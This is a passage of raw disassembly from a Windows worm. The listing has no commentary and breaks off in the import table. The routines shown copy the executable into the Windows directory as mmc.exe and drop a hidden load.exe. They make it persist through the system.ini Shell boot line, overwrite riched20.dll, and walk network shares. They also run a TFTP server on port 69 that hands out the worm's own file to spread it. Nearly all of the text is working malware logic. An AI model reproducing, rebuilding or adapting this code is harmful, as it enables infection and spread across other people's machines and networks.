loc_36176B2C: ; CODE XREF: sub_36176AE6+3Dj 36176B2C push 1 36176B2E pop eax 36176B2F jmp loc_36176C4E 36176B34 ; ─────────────────────────────────────────────────────────────────────────── 36176B34 36176B34 loc_36176B34: ; CODE XREF: sub_36176AE6+39j 36176B34 push ebx 36176B35 push edi 36176B36 call ds:CloseHandle 36176B3C mov ebx, ds:GetModuleFileNameA 36176B42 mov edi, 400h 36176B47 lea eax, [ebp+var_854] 36176B4D push edi 36176B4E push eax 36176B4F push [ebp+arg_0] 36176B52 call ebx ; GetModuleFileNameA 36176B54 test eax, eax 36176B56 jnz short loc_36176B63 36176B58 lea eax, [ebp+var_854] 36176B5E push edi 36176B5F push eax 36176B60 push esi 36176B61 call ebx ; GetModuleFileNameA 36176B63 36176B63 loc_36176B63: ; CODE XREF: sub_36176AE6+70j 36176B63 lea eax, [ebp+var_454] 36176B69 push edi 36176B6A push eax 36176B6B call ds:GetWindowsDirectoryA 36176B71 lea eax, [ebp+var_454] 36176B77 push eax 36176B78 call sub_3617186E 36176B7D lea eax, [ebp+var_454] 36176B83 mov [esp+864h+var_864], offset aMmc_exe ; "\\mmc.exe" 36176B8A push eax 36176B8B call _strcat 36176B90 pop ecx 36176B91 lea eax, [ebp+var_454] 36176B97 pop ecx 36176B98 push esi 36176B99 push eax 36176B9A lea eax, [ebp+var_854] 36176BA0 push eax 36176BA1 call ds:CopyFileA 36176BA7 lea eax, [ebp+var_454] 36176BAD push 1 36176BAF push eax 36176BB0 call sub_361719A3 36176BB5 lea eax, [ebp+var_454] 36176BBB push offset aQusery9bnow ; " -qusery9bnow" 36176BC0 push eax 36176BC1 call _strcat 36176BC6 push 44h 36176BC8 lea eax, [ebp+var_54] 36176BCB pop edi 36176BCC push edi 36176BCD push esi 36176BCE push eax 36176BCF call _memset 36176BD4 push 10h 36176BD6 lea eax, [ebp+var_10] 36176BD9 push esi 36176BDA push eax 36176BDB call _memset 36176BE0 add esp, 28h 36176BE3 lea eax, [ebp+var_10] 36176BE6 mov [ebp+var_54], edi 36176BE9 mov [ebp+var_24], si 36176BED push eax 36176BEE lea eax, [ebp+var_54] 36176BF1 push eax 36176BF2 push esi 36176BF3 push esi 36176BF4 push esi 36176BF5 push esi 36176BF6 push esi 36176BF7 lea eax, [ebp+var_454] 36176BFD push esi 36176BFE push eax 36176BFF push esi 36176C00 call ds:CreateProcessA 36176C06 push 1 36176C08 pop eax 36176C09 pop ebx 36176C0A jmp short loc_36176C4E 36176C0C ; ─────────────────────────────────────────────────────────────────────────── 36176C0C 36176C0C loc_36176C0C: ; CODE XREF: sub_36176AE6+17j 36176C0C push 400h 36176C11 call ds:GetCommandLineA 36176C17 push eax 36176C18 lea eax, [ebp+var_854] 36176C1E push eax 36176C1F call ds:strncpy 36176C25 lea eax, [ebp+var_854] 36176C2B push eax 36176C2C call ds:_strlwr 36176C32 lea eax, [ebp+var_854] 36176C38 push offset aQusery9bnow_0 ; "qusery9bnow" 36176C3D push eax 36176C3E call ds:strstr 36176C44 add esp, 18h 36176C47 neg eax 36176C49 sbb eax, eax 36176C4B and eax, 63h 36176C4E 36176C4E loc_36176C4E: ; CODE XREF: sub_36176AE6+49j 36176C4E ; sub_36176AE6+124j 36176C4E pop edi 36176C4F pop esi 36176C50 leave 36176C51 retn 36176C51 sub_36176AE6 endp 36176C51 36176C52 36176C52 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36176C52 36176C52 ; Attributes: bp-based frame 36176C52 36176C52 sub_36176C52 proc near ; CODE XREF: sub_36171F05+F5p 36176C52 36176C52 var_400 = byte ptr -400h 36176C52 36176C52 push ebp 36176C53 mov ebp, esp 36176C55 sub esp, 400h 36176C5B push ebx 36176C5C push esi 36176C5D mov esi, ds:strncpy 36176C63 mov ebx, 3F6h 36176C68 push edi 36176C69 push ebx 36176C6A lea eax, [ebp+var_400] 36176C70 push offset byte_3617ACB8 36176C75 push eax 36176C76 call esi ; strncpy 36176C78 lea eax, [ebp+var_400] 36176C7E push offset aLoad_exe ; "\\load.exe" 36176C83 push eax 36176C84 call _strcat 36176C89 add esp, 14h 36176C8C lea eax, [ebp+var_400] 36176C92 push 0 36176C94 push eax 36176C95 push offset byte_3617C0B8 36176C9A call ds:CopyFileA 36176CA0 mov edi, ds:SetFileAttributesA 36176CA6 lea eax, [ebp+var_400] 36176CAC push 26h 36176CAE push eax 36176CAF call edi ; SetFileAttributesA 36176CB1 push ebx 36176CB2 lea eax, [ebp+var_400] 36176CB8 push offset byte_3617B0B8 36176CBD push eax 36176CBE call esi ; strncpy 36176CC0 lea eax, [ebp+var_400] 36176CC6 push offset aSystem_ini ; "\\system.ini" 36176CCB push eax 36176CCC call _strcat 36176CD1 add esp, 14h 36176CD4 lea eax, [ebp+var_400] 36176CDA push eax 36176CDB push offset aExplorer_exeLo ; "explorer.exe load.exe -dontrunold" 36176CE0 push offset shell ; "Shell" 36176CE5 push offset boot ; "boot" 36176CEA call ds:WritePrivateProfileStringA 36176CF0 push ebx 36176CF1 lea eax, [ebp+var_400] 36176CF7 push offset byte_3617ACB8 36176CFC push eax 36176CFD call esi ; strncpy 36176CFF lea eax, [ebp+var_400] 36176D05 push offset aRiched20_dll_0 ; "\\riched20.dll" 36176D0A push eax 36176D0B call _strcat 36176D10 add esp, 14h 36176D13 lea eax, [ebp+var_400] 36176D19 push 80h 36176D1E push eax 36176D1F call edi ; SetFileAttributesA 36176D21 lea eax, [ebp+var_400] 36176D27 push 0 36176D29 push eax 36176D2A push offset byte_3617C0B8 36176D2F call ds:CopyFileA 36176D35 lea eax, [ebp+var_400] 36176D3B push 0 36176D3D push eax 36176D3E call sub_361719A3 36176D43 pop ecx 36176D44 lea eax, [ebp+var_400] 36176D4A pop ecx 36176D4B push 26h 36176D4D push eax 36176D4E call edi ; SetFileAttributesA 36176D50 push 1 36176D52 pop eax 36176D53 pop edi 36176D54 pop esi 36176D55 pop ebx 36176D56 leave 36176D57 retn 36176D57 sub_36176C52 endp 36176D57 36176D58 36176D58 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36176D58 36176D58 ; Attributes: bp-based frame 36176D58 36176D58 sub_36176D58 proc near ; CODE XREF: sub_36171F05+112p 36176D58 ; sub_36176D58+DBp ... 36176D58 36176D58 var_34 = byte ptr -34h 36176D58 var_18 = dword ptr -18h 36176D58 var_14 = dword ptr -14h 36176D58 var_10 = dword ptr -10h 36176D58 var_C = dword ptr -0Ch 36176D58 var_8 = dword ptr -8 36176D58 var_4 = dword ptr -4 36176D58 arg_0 = dword ptr 8 36176D58 36176D58 push ebp 36176D59 mov ebp, esp 36176D5B sub esp, 34h 36176D5E lea eax, [ebp-0Ch] 36176D61 push edi 36176D62 or dword ptr [ebp-4], 0FFFFFFFFh 36176D66 push eax 36176D67 push dword ptr [ebp+8] 36176D6A xor edi, edi 36176D6C mov dword ptr [ebp-8], 4000h 36176D73 push edi 36176D74 push edi 36176D75 push 2 36176D77 call dword_3617AC88 36176D7D test eax, eax 36176D7F jz short loc_36176D88 36176D81 xor eax, eax 36176D83 jmp loc_36176E8C 36176D88 ; ─────────────────────────────────────────────────────────────────────────── 36176D88 36176D88 loc_36176D88: ; CODE XREF: sub_36176D58+27j 36176D88 push ebx 36176D89 push esi 36176D8A 36176D8A loc_36176D8A: ; CODE XREF: sub_36176D58+111j 36176D8A push dword ptr [ebp-8] 36176D8D push 8 36176D8F push dword_3617ACB4 36176D95 call dword_3617AC74 36176D9B mov esi, eax 36176D9D lea eax, [ebp-8] 36176DA0 push eax 36176DA1 lea eax, [ebp-4] 36176DA4 push esi 36176DA5 push eax 36176DA6 push dword ptr [ebp-0Ch] 36176DA9 mov [ebp-14h], esi 36176DAC call dword_3617AC8C 36176DB2 cmp eax, edi 36176DB4 mov [ebp-18h], eax 36176DB7 jnz loc_36176E4B 36176DBD cmp [ebp-4], edi 36176DC0 mov [ebp+8], edi 36176DC3 jbe loc_36176E52 36176DC9 add esi, 14h 36176DCC 36176DCC loc_36176DCC: ; CODE XREF: sub_36176D58+ECj 36176DCC cmp dword ptr [esi-10h], 1 36176DD0 jnz short loc_36176E25 36176DD2 lea eax, [ebp-10h] 36176DD5 mov dword ptr [ebp-10h], 19h 36176DDC push eax 36176DDD lea eax, [ebp-34h] 36176DE0 push eax 36176DE1 call ds:GetComputerNameA 36176DE7 push edi 36176DE8 lea ebx, [esi-14h] 36176DEB push edi 36176DEC push edi 36176DED push ebx 36176DEE call dword_3617AC80 36176DF4 test eax, eax 36176DF6 jnz short loc_36176E0C 36176DF8 push dword ptr [esi] 36176DFA 36176DFA loc_36176DFA: ; CODE XREF: sub_36176D58+C5j 36176DFA call sub_36173DCF 36176DFF pop ecx 36176E00 push edi 36176E01 push edi 36176E02 push dword ptr [esi] 36176E04 call dword_3617AC84 36176E0A jmp short loc_36176E25 36176E0C ; ─────────────────────────────────────────────────────────────────────────── 36176E0C 36176E0C loc_36176E0C: ; CODE XREF: sub_36176D58+9Ej 36176E0C push edi 36176E0D lea eax, [ebp+var_34] 36176E10 push edi 36176E11 push eax 36176E12 push ebx 36176E13 call dword_3617AC80 36176E19 push dword ptr [esi] 36176E1B test eax, eax 36176E1D jz short loc_36176DFA 36176E1F call sub_36173DCF 36176E24 pop ecx 36176E25 36176E25 loc_36176E25: ; CODE XREF: sub_36176D58+78j 36176E25 ; sub_36176D58+B2j 36176E25 mov eax, [esi-8] 36176E28 and eax, 2 36176E2B cmp al, 2 36176E2D jnz short loc_36176E38 36176E2F lea eax, [esi-14h] 36176E32 push eax 36176E33 call sub_36176D58 36176E38 36176E38 loc_36176E38: ; CODE XREF: sub_36176D58+D5j 36176E38 inc dword ptr [ebp+8] 36176E3B add esi, 20h 36176E3E mov eax, [ebp+8] 36176E41 cmp eax, [ebp-4] 36176E44 jb short loc_36176DCC 36176E46 mov esi, [ebp-14h] 36176E49 jmp short loc_36176E52 36176E4B ; ─────────────────────────────────────────────────────────────────────────── 36176E4B 36176E4B loc_36176E4B: ; CODE XREF: sub_36176D58+5Fj 36176E4B cmp eax, 103h 36176E50 jnz short loc_36176E6E 36176E52 36176E52 loc_36176E52: ; CODE XREF: sub_36176D58+6Bj 36176E52 ; sub_36176D58+F1j 36176E52 push esi 36176E53 push edi 36176E54 push dword_3617ACB4 36176E5A call dword_3617AC70 36176E60 cmp dword ptr [ebp-18h], 103h 36176E67 jz short loc_36176E7C 36176E69 jmp loc_36176D8A 36176E6E ; ─────────────────────────────────────────────────────────────────────────── 36176E6E 36176E6E loc_36176E6E: ; CODE XREF: sub_36176D58+F8j 36176E6E push esi 36176E6F push edi 36176E70 push dword_3617ACB4 36176E76 call dword_3617AC70 36176E7C 36176E7C loc_36176E7C: ; CODE XREF: sub_36176D58+10Fj 36176E7C push dword ptr [ebp-0Ch] 36176E7F call dword_3617AC90 36176E85 neg eax 36176E87 sbb eax, eax 36176E89 pop esi 36176E8A inc eax 36176E8B pop ebx 36176E8C 36176E8C loc_36176E8C: ; CODE XREF: sub_36176D58+2Bj 36176E8C pop edi 36176E8D leave 36176E8E retn 4 36176E8E sub_36176D58 endp 36176E8E 36176E91 36176E91 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36176E91 36176E91 ; Attributes: bp-based frame 36176E91 36176E91 sub_36176E91 proc near ; CODE XREF: sub_36171F05+151p 36176E91 36176E91 var_B0 = byte ptr -0B0h 36176E91 var_70 = byte ptr -70h 36176E91 var_20 = dword ptr -20h 36176E91 var_1C = dword ptr -1Ch 36176E91 var_18 = dword ptr -18h 36176E91 var_14 = dword ptr -14h 36176E91 var_C = dword ptr -0Ch 36176E91 36176E91 push ebp 36176E92 mov ebp, esp 36176E94 sub esp, 0B0h 36176E9A push esi 36176E9B call sub_36172DAE 36176EA0 push eax 36176EA1 call dword_3617AC24 36176EA7 push 3Fh 36176EA9 push eax 36176EAA lea eax, [ebp-0B0h] 36176EB0 push eax 36176EB1 call ds:strncpy 36176EB7 lea eax, [ebp-70h] 36176EBA push offset asc_3617A404 ; "\\\\" 36176EBF push eax 36176EC0 call _strcpy 36176EC5 lea eax, [ebp-0B0h] 36176ECB push 3Ch 36176ECD push eax 36176ECE lea eax, [ebp-70h] 36176ED1 push eax 36176ED2 call ds:strncat 36176ED8 push 20h 36176EDA lea eax, [ebp-20h] 36176EDD push 0 36176EDF push eax 36176EE0 call _memset 36176EE5 add esp, 2Ch 36176EE8 and dword ptr [ebp-18h], 0 36176EEC lea eax, [ebp-70h] 36176EEF mov dword ptr [ebp-20h], 2 36176EF6 push 1 36176EF8 mov [ebp-0Ch], eax 36176EFB pop esi 36176EFC lea eax, [ebp-20h] 36176EFF push eax 36176F00 mov [ebp-1Ch], esi 36176F03 mov [ebp-14h], esi 36176F06 call sub_36176D58 36176F0B mov eax, esi 36176F0D pop esi 36176F0E leave 36176F0F retn 36176F0F sub_36176E91 endp 36176F0F 36176F10 36176F10 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36176F10 36176F10 36176F10 sub_36176F10 proc near ; CODE XREF: sub_36171F05+A4p 36176F10 push ecx 36176F11 lea eax, [esp+0] 36176F15 push eax 36176F16 xor eax, eax 36176F18 push eax 36176F19 push eax 36176F1A push offset sub_36176F2C 36176F1F push eax 36176F20 push eax 36176F21 call ds:CreateThread 36176F27 push 1 36176F29 pop eax 36176F2A pop ecx 36176F2B retn 36176F2B sub_36176F10 endp 36176F2B 36176F2C 36176F2C ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36176F2C 36176F2C ; Attributes: bp-based frame 36176F2C 36176F2C sub_36176F2C proc near ; DATA XREF: sub_36176F10+Ao 36176F2C 36176F2C var_644 = word ptr -644h 36176F2C var_440 = byte ptr -440h 36176F2C var_23C = byte ptr -23Ch 36176F2C var_23A = byte ptr -23Ah 36176F2C var_239 = byte ptr -239h 36176F2C var_38 = byte ptr -38h 36176F2C var_34 = byte ptr -34h 36176F2C var_32 = word ptr -32h 36176F2C var_30 = dword ptr -30h 36176F2C var_24 = word ptr -24h 36176F2C var_22 = word ptr -22h 36176F2C var_20 = dword ptr -20h 36176F2C var_14 = byte ptr -14h 36176F2C var_F = byte ptr -0Fh 36176F2C var_8 = dword ptr -8 36176F2C var_4 = dword ptr -4 36176F2C 36176F2C push ebp 36176F2D mov ebp, esp 36176F2F sub esp, 644h 36176F35 push ebx 36176F36 push esi 36176F37 push 0FFFFFFF1h 36176F39 call ds:GetCurrentThread 36176F3F push eax 36176F40 call ds:SetThreadPriority 36176F46 xor ebx, ebx 36176F48 push ebx 36176F49 push ebx 36176F4A push ebx 36176F4B call ds:CreateMutexA 36176F51 cmp eax, ebx 36176F53 mov dword_3617D70C, eax 36176F58 jnz short loc_36176F62 36176F5A 36176F5A loc_36176F5A: ; CODE XREF: sub_36176F2C+74j 36176F5A xor eax, eax 36176F5C 36176F5C loc_36176F5C: ; CODE XREF: sub_36176F2C+92j 36176F5C pop esi 36176F5D pop ebx 36176F5E leave 36176F5F retn 4 36176F62 ; ─────────────────────────────────────────────────────────────────────────── 36176F62 36176F62 loc_36176F62: ; CODE XREF: sub_36176F2C+2Cj 36176F62 push 10h 36176F64 lea eax, [ebp-24h] 36176F67 push ebx 36176F68 push eax 36176F69 call _memset 36176F6E add esp, 0Ch 36176F71 mov word ptr [ebp-24h], 2 36176F77 push ebx 36176F78 call dword_3617AC2C 36176F7E push 45h 36176F80 mov [ebp-20h], eax 36176F83 call dword_3617AC38 36176F89 push ebx 36176F8A push 2 36176F8C push 2 36176F8E mov [ebp-22h], ax 36176F92 call dword_3617AC5C 36176F98 mov esi, eax 36176F9A cmp esi, 0FFFFFFFFh 36176F9D mov [ebp-4], esi 36176FA0 jz short loc_36176F5A 36176FA2 push edi 36176FA3 lea eax, [ebp-24h] 36176FA6 push 10h 36176FA8 push eax 36176FA9 push esi 36176FAA call dword_3617AC54 36176FB0 test eax, eax 36176FB2 jz short loc_36176FC0 36176FB4 push esi 36176FB5 call dword_3617AC3C 36176FBB xor eax, eax 36176FBD pop edi 36176FBE jmp short loc_36176F5C 36176FC0 ; ─────────────────────────────────────────────────────────────────────────── 36176FC0 36176FC0 loc_36176FC0: ; CODE XREF: sub_36176F2C+86j 36176FC0 ; sub_36176F2C+C9j ... 36176FC0 push 10h 36176FC2 pop eax 36176FC3 mov [ebp-8], eax 36176FC6 push eax 36176FC7 lea eax, [ebp-34h] 36176FCA push ebx 36176FCB push eax 36176FCC call _memset 36176FD1 add esp, 0Ch 36176FD4 lea eax, [ebp-8] 36176FD7 push eax 36176FD8 lea eax, [ebp-34h] 36176FDB push eax 36176FDC push ebx 36176FDD lea eax, [ebp-23Ch] 36176FE3 push 204h 36176FE8 push eax 36176FE9 push dword ptr [ebp-4] 36176FEC call dword_3617AC4C 36176FF2 cmp eax, 0FFFFFFFFh 36176FF5 jz short loc_36176FC0 36176FF7 lea eax, [ebp-23Ch] 36176FFD push 4 36176FFF push eax 36177000 lea eax, [ebp-644h] 36177006 push eax 36177007 call _memcpy 3617700C add esp, 0Ch 3617700F push 1 36177011 call dword_3617AC34 36177017 cmp [ebp-644h], ax 3617701E jnz short loc_36176FC0 36177020 lea eax, [ebp-23Ah] 36177026 push 202h 3617702B push eax 3617702C lea eax, [ebp-440h] 36177032 push eax 36177033 call _memcpy 36177038 lea eax, [ebp-440h] 3617703E push eax 3617703F call _strlen 36177044 add esp, 10h 36177047 cmp eax, ebx 36177049 jz loc_36176FC0 3617704F cmp eax, 1FAh 36177054 jge loc_36176FC0 3617705A lea eax, [ebp+eax-239h] 36177061 push 6 36177063 push eax 36177064 lea eax, [ebp-14h] 36177067 push eax 36177068 call _memcpy 3617706D lea eax, [ebp-14h] 36177070 mov [ebp-0Fh], bl 36177073 push eax 36177074 call ds:_strlwr 3617707A lea eax, [ebp+var_14] 3617707D push offset aOctet ; "octet" 36177082 push eax 36177083 call _strcmp 36177088 add esp, 18h 3617708B test eax, eax 3617708D jnz loc_36176FC0 36177093 push 0FFFFFFFFh 36177095 push dword_3617D70C 3617709B call ds:WaitForSingleObject 361770A1 mov eax, dword_3617D710 361770A6 361770A6 loc_361770A6: ; CODE XREF: sub_36176F2C+193j 361770A6 cmp eax, ebx 361770A8 jz short loc_361770C1 361770AA mov ecx, [eax+4] 361770AD cmp ecx, [ebp+var_30] 361770B0 jnz short loc_361770BC 361770B2 mov cx, [eax+2] 361770B6 cmp cx, [ebp+var_32] 361770BA jz short loc_361770FF 361770BC 361770BC loc_361770BC: ; CODE XREF: sub_36176F2C+184j 361770BC mov eax, [eax+10h] 361770BF jmp short loc_361770A6 361770C1 ; ─────────────────────────────────────────────────────────────────────────── 361770C1 361770C1 loc_361770C1: ; CODE XREF: sub_36176F2C+17Cj 361770C1 push 14h 361770C3 push 8 361770C5 push dword_3617ACB4 361770CB call dword_3617AC74 361770D1 cmp eax, ebx 361770D3 jz short loc_361770FF 361770D5 lea esi, [ebp+var_34] 361770D8 mov edi, eax 361770DA movsd 361770DB movsd 361770DC movsd 361770DD movsd 361770DE mov ecx, dword_3617D710 361770E4 mov [eax+10h], ecx 361770E7 lea ecx, [ebp+var_38] 361770EA push ecx 361770EB push ebx 361770EC push eax 361770ED push offset sub_36177110 361770F2 push ebx 361770F3 push ebx 361770F4 mov dword_3617D710, eax 361770F9 call ds:CreateThread 361770FF 361770FF loc_361770FF: ; CODE XREF: sub_36176F2C+18Ej 361770FF ; sub_36176F2C+1A7j 361770FF push dword_3617D70C 36177105 call ds:ReleaseMutex 3617710B jmp loc_36176FC0 3617710B sub_36176F2C endp 3617710B 36177110 36177110 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36177110 36177110 ; Attributes: bp-based frame 36177110 36177110 sub_36177110 proc near ; DATA XREF: sub_36176F2C+1C1o 36177110 36177110 var_52C = dword ptr -52Ch 36177110 var_328 = word ptr -328h 36177110 var_326 = word ptr -326h 36177110 var_324 = byte ptr -324h 36177110 var_124 = dword ptr -124h 36177110 var_120 = dword ptr -120h 36177110 var_20 = dword ptr -20h 36177110 var_1C = dword ptr -1Ch 36177110 var_14 = dword ptr -14h 36177110 var_10 = dword ptr -10h 36177110 var_C = dword ptr -0Ch 36177110 var_8 = dword ptr -8 36177110 var_4 = dword ptr -4 36177110 arg_0 = dword ptr 8 36177110 36177110 push ebp 36177111 mov ebp, esp 36177113 sub esp, 52Ch 36177119 push ebx 3617711A push esi 3617711B push edi 3617711C push 0FFFFFFF1h 3617711E call ds:GetCurrentThread 36177124 push eax 36177125 call ds:SetThreadPriority 3617712B xor esi, esi 3617712D push esi 3617712E push 2 36177130 push 2 36177132 call dword_3617AC5C 36177138 mov edi, eax 3617713A cmp edi, 0FFFFFFFFh 3617713D jz loc_3617737F 36177143 push 10h 36177145 push [ebp+arg_0] 36177148 push edi 36177149 call dword_3617AC58 3617714F test eax, eax 36177151 jnz loc_36177378 36177157 push esi 36177158 push esi 36177159 push 3 3617715B push esi 3617715C push 7 3617715E push 80000000h 36177163 push offset byte_3617C4B8 36177168 call ds:CreateFileA 3617716E cmp eax, 0FFFFFFFFh 36177171 mov [ebp+var_20], eax 36177174 jz loc_36177378 3617717A push esi 3617717B push eax 3617717C call ds:GetFileSize 36177182 cmp eax, 0FFFFFFFFh 36177185 jz loc_3617736F 3617718B push 1 3617718D mov [ebp+var_8], eax 36177190 pop ebx 36177191 mov [ebp+var_C], ebx 36177194 36177194 loc_36177194: ; CODE XREF: sub_36177110+25Aj 36177194 push 3 36177196 call dword_3617AC38 3617719C push [ebp+var_C] 3617719F mov [ebp+var_328], ax 361771A6 call dword_3617AC38 361771AC cmp [ebp+var_8], esi 361771AF mov [ebp+var_326], ax 361771B6 mov [ebp+var_4], esi 361771B9 jz short loc_361771DD 361771BB lea eax, [ebp+var_4] 361771BE push esi 361771BF push eax 361771C0 lea eax, [ebp+var_324] 361771C6 push 200h 361771CB push eax 361771CC push [ebp+var_20] 361771CF call ds:ReadFile 361771D5 mov eax, [ebp+var_4] 361771D8 sub [ebp+var_8], eax 361771DB jmp short loc_361771E1 361771DD ; ─────────────────────────────────────────────────────────────────────────── 361771DD 361771DD loc_361771DD: ; CODE XREF: sub_36177110+A9j 361771DD or [ebp+var_8], 0FFFFFFFFh 361771E1 361771E1 loc_361771E1: ; CODE XREF: sub_36177110+CBj 361771E1 mov [ebp+var_10], esi 361771E4 361771E4 loc_361771E4: ; CODE XREF: sub_36177110+252j 361771E4 cmp [ebp+var_10], 6 361771E8 jge loc_3617736F 361771EE push 8 361771F0 lea eax, [ebp+var_1C] 361771F3 push esi 361771F4 push eax 361771F5 mov [ebp+var_14], esi 361771F8 call _memset 361771FD add esp, 0Ch 36177200 lea eax, [ebp+var_1C] 36177203 mov [ebp+var_1C], 2 3617720A mov [ebp+var_120], edi 36177210 push eax 36177211 lea eax, [ebp+var_124] 36177217 push esi 36177218 push eax 36177219 push esi 3617721A push esi 3617721B mov [ebp+var_124], ebx 36177221 call dword_3617AC40 36177227 cmp eax, esi 36177229 jz loc_3617736F 3617722F cmp eax, 0FFFFFFFFh 36177232 jz loc_3617736F 36177238 lea eax, [ebp+var_124] 3617723E push eax 3617723F push edi 36177240 call dword_3617AC60 36177246 test eax, eax 36177248 jz loc_3617736F 3617724E mov eax, [ebp+var_4] 36177251 push esi 36177252 add eax, 4 36177255 push eax 36177256 lea eax, [ebp+var_328] 3617725C push eax 3617725D push edi 3617725E call dword_3617AC48 36177264 lea eax, [ebp+var_1C] 36177267 push eax 36177268 lea eax, [ebp+var_124] 3617726E push esi 3617726F push eax 36177270 push esi 36177271 push esi 36177272 call dword_3617AC40 36177278 cmp eax, esi 3617727A jz loc_3617736F 36177280 cmp eax, 0FFFFFFFFh 36177283 jz loc_3617736F 36177289 lea eax, [ebp+var_124] 3617728F push eax 36177290 push edi 36177291 call dword_3617AC60 36177297 test eax, eax 36177299 jz loc_3617736F 3617729F mov eax, [ebp+var_4] 361772A2 push esi 361772A3 add eax, 4 361772A6 push eax 361772A7 lea eax, [ebp+var_328] 361772AD push eax 361772AE push edi 361772AF call dword_3617AC48 361772B5 361772B5 loc_361772B5: ; CODE XREF: sub_36177110+249j 361772B5 inc [ebp+var_14] 361772B8 push 8 361772BA lea eax, [ebp+var_1C] 361772BD push esi 361772BE push eax 361772BF call _memset 361772C4 add esp, 0Ch 361772C7 lea eax, [ebp+var_1C] 361772CA mov [ebp+var_1C], 2 361772D1 mov [ebp+var_120], edi 361772D7 push eax 361772D8 push esi 361772D9 lea eax, [ebp+var_124] 361772DF push esi 361772E0 push eax 361772E1 push esi 361772E2 mov [ebp+var_124], ebx 361772E8 call dword_3617AC40 361772EE cmp eax, esi 361772F0 jz short loc_36177355 361772F2 cmp eax, 0FFFFFFFFh 361772F5 jz short loc_36177355 361772F7 lea eax, [ebp+var_124] 361772FD push eax 361772FE push edi 361772FF call dword_3617AC60 36177305 test eax, eax 36177307 jz short loc_36177355 36177309 push esi 3617730A lea eax, [ebp+var_52C] 36177310 push 204h 36177315 push eax 36177316 push edi 36177317 call dword_3617AC50 3617731D push [ebp+var_52C] 36177323 call dword_3617AC34 36177329 cmp ax, 5 3617732D jz short loc_3617736F 3617732F push [ebp+var_52C] 36177335 call dword_3617AC34 3617733B cmp ax, 4 3617733F jnz short loc_36177355 36177341 push [ebp+var_52C+2] 36177347 call dword_3617AC34 3617734D movzx eax, ax 36177350 cmp eax, [ebp+var_C] 36177353 jz short loc_36177367 36177355 36177355 loc_36177355: ; CODE XREF: sub_36177110+1E0j 36177355 ; sub_36177110+1E5j ... 36177355 cmp [ebp+var_14], 3 36177359 jl loc_361772B5 3617735F inc [ebp+var_10] 36177362 jmp loc_361771E4 36177367 ; ─────────────────────────────────────────────────────────────────────────── 36177367 36177367 loc_36177367: ; CODE XREF: sub_36177110+243j 36177367 inc [ebp+var_C] 3617736A jmp loc_36177194 3617736F ; ─────────────────────────────────────────────────────────────────────────── 3617736F 3617736F loc_3617736F: ; CODE XREF: sub_36177110+75j 3617736F ; sub_36177110+D8j ... 3617736F push [ebp+var_20] 36177372 call ds:CloseHandle 36177378 36177378 loc_36177378: ; CODE XREF: sub_36177110+41j 36177378 ; sub_36177110+64j 36177378 push edi 36177379 call dword_3617AC3C 3617737F 3617737F loc_3617737F: ; CODE XREF: sub_36177110+2Dj 3617737F push 0FFFFFFFFh 36177381 push dword_3617D70C 36177387 call ds:WaitForSingleObject 3617738D mov eax, dword_3617D710 36177392 mov ecx, offset dword_3617D710 36177397 cmp eax, esi 36177399 jz short loc_361773CF 3617739B mov edi, [ebp+arg_0] 3617739E mov edx, [edi+4] 361773A1 361773A1 loc_361773A1: ; CODE XREF: sub_36177110+2A8j 361773A1 cmp [eax+4], edx 361773A4 jnz short loc_361773B0 361773A6 mov bx, [eax+2] 361773AA cmp bx, [edi+2] 361773AE jz short loc_361773BC 361773B0 361773B0 loc_361773B0: ; CODE XREF: sub_36177110+294j 361773B0 lea ecx, [eax+10h] 361773B3 mov eax, [eax+10h] 361773B6 cmp eax, esi 361773B8 jnz short loc_361773A1 361773BA jmp short loc_361773CF 361773BC ; ─────────────────────────────────────────────────────────────────────────── 361773BC 361773BC loc_361773BC: ; CODE XREF: sub_36177110+29Ej 361773BC mov edx, [eax+10h] 361773BF push eax 361773C0 push esi 361773C1 mov [ecx], edx 361773C3 push dword_3617ACB4 361773C9 call dword_3617AC70 361773CF 361773CF loc_361773CF: ; CODE XREF: sub_36177110+289j 361773CF ; sub_36177110+2AAj 361773CF push dword_3617D70C 361773D5 call ds:ReleaseMutex 361773DB pop edi 361773DC pop esi 361773DD xor eax, eax 361773DF pop ebx 361773E0 leave 361773E1 retn 4 361773E1 sub_36177110 endp 361773E1 361773E4 ; [00000006 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND] 361773EA ; [00000006 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND] 361773F0 ; [00000006 BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND] 361773F6 ; [00000006 BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND] 361773FC ; [00000006 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND] 36177402 ; [00000006 BYTES: COLLAPSED FUNCTION _strcmp. PRESS KEYPAD "+" TO EXPAND] 36177408 ; [000000AB BYTES: COLLAPSED FUNCTION __CRT_INIT@12. PRESS KEYPAD "+" TO EXPAND] 361774B3 ; [0000009D BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND] 36177550 ; [00000006 BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND] 36177556 dd 2AAh dup(0) 36177FFE db 2 dup(0) 36177FFE _text ends 36177FFE 36178000 ; Section 2. (virtual address 00008000) 36178000 ; Virtual size : 0000092A ( 2346.) 36178000 ; Section size in file : 00001000 ( 4096.) 36178000 ; Offset to raw data for section: 00008000 36178000 ; Flags 40000040: Data Readable 36178000 ; Alignment : 16 bytes ? 36178000 ; 36178000 ; Imports from ADVAPI32.dll 36178000 ; 36178000 ; ═══════════════════════════════════════════════════════════════════════════ 36178000 36178000 ; Segment type: Externs 36178000 ; _idata 36178000 extrn RegDeleteKeyA:dword ; DATA XREF: sub_3617206D+182r 36178004 extrn RegQueryValueA:dword ; DATA XREF: sub_36174E10+B8r 36178008 extrn RegSetValueExA:dword ; DATA XREF: sub_3617206D+32r 36178008 ; sub_3617206D+47r ... 3617800C extrn RegEnumValueA:dword ; DATA XREF: sub_3617206D+150r 3617800C ; sub_3617206D+172r ... 36178010 extrn RegCloseKey:dword ; DATA XREF: sub_3617164B+FBr 36178010 ; sub_3617164B+15Br ... 36178014 extrn 